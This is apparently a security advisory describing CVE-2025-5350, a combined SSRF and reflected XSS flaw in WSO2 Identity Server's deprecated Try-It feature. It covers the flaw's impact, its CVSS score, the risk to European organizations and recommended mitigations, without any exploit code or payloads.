CVE-2025-5350 is a vulnerability identified in multiple versions of WSO2 Identity Server (5.10.0 through 7.1.0) that combines server-side request forgery (SSRF) and reflected cross-site scripting (XSS) vulnerabilities within the deprecated Try-It feature. This feature, accessible only to administrative users, accepts user-supplied URLs without proper validation, allowing an attacker to force the server to make arbitrary HTTP requests to internal or external resources. The content retrieved by these requests is then directly reflected in the HTTP response to the administrator’s browser, enabling reflected XSS attacks. This XSS can execute arbitrary JavaScript in the context of the admin user’s session, potentially leading to UI manipulation or data exfiltration, although session cookies are protected by the HttpOnly flag, limiting cookie theft. The SSRF component also poses a risk by enabling privileged users to query internal services that may not be otherwise accessible, aiding internal network enumeration and potentially facilitating further attacks. Exploitation requires tricking an administrator into clicking a maliciously crafted link, with no additional user interaction required. The vulnerability has a CVSS 3.1 base score of 5.9, indicating medium severity due to the need for high privileges but low attack complexity and the potential for confidentiality, integrity, and availability impacts. No public exploits are currently known, and no patches have been linked yet, emphasizing the need for immediate mitigation steps. The vulnerability is tracked under CWE-918 (SSRF) and CWE-79 (Reflected XSS).

For European organizations, this vulnerability presents a significant risk primarily in environments where WSO2 Identity Server is deployed for identity and access management. The SSRF aspect can allow attackers or malicious insiders with administrative access to probe internal network services, potentially exposing sensitive internal infrastructure details or accessing restricted services. The reflected XSS can lead to arbitrary script execution in the administrator’s browser, risking UI manipulation, unauthorized actions, or data leakage within the administrative context. Although session cookies are protected, the XSS still enables impactful attacks such as credential theft via other means, phishing, or manipulation of administrative workflows. This could lead to compromised identity management, unauthorized access, and potential lateral movement within the network. Given the critical role of identity servers in authentication and authorization, exploitation could disrupt business operations and compromise sensitive data. The medium CVSS score reflects moderate risk, but the requirement for administrative privileges and user interaction (clicking a crafted link) somewhat limits the attack surface. However, targeted attacks against high-value European organizations, especially those with large internal networks or complex identity infrastructures, could have serious consequences.

European organizations should immediately disable the deprecated Try-It feature in affected WSO2 Identity Server versions to eliminate the attack vector. If disabling is not feasible, restrict access to the administrative interface strictly to trusted networks and users, employing network segmentation and multi-factor authentication to reduce the risk of administrator compromise. Monitor administrative user activity for suspicious link clicks or unusual behavior. Implement web application firewalls (WAFs) with rules to detect and block SSRF and reflected XSS patterns targeting the Try-It feature endpoints. Regularly audit and update WSO2 Identity Server to the latest versions once patches become available. Conduct internal network scans to identify and secure any internal services that could be exposed via SSRF. Educate administrators about phishing risks and the dangers of clicking untrusted links, especially within administrative contexts. Finally, implement robust logging and alerting on administrative actions and unusual HTTP requests to detect exploitation attempts early.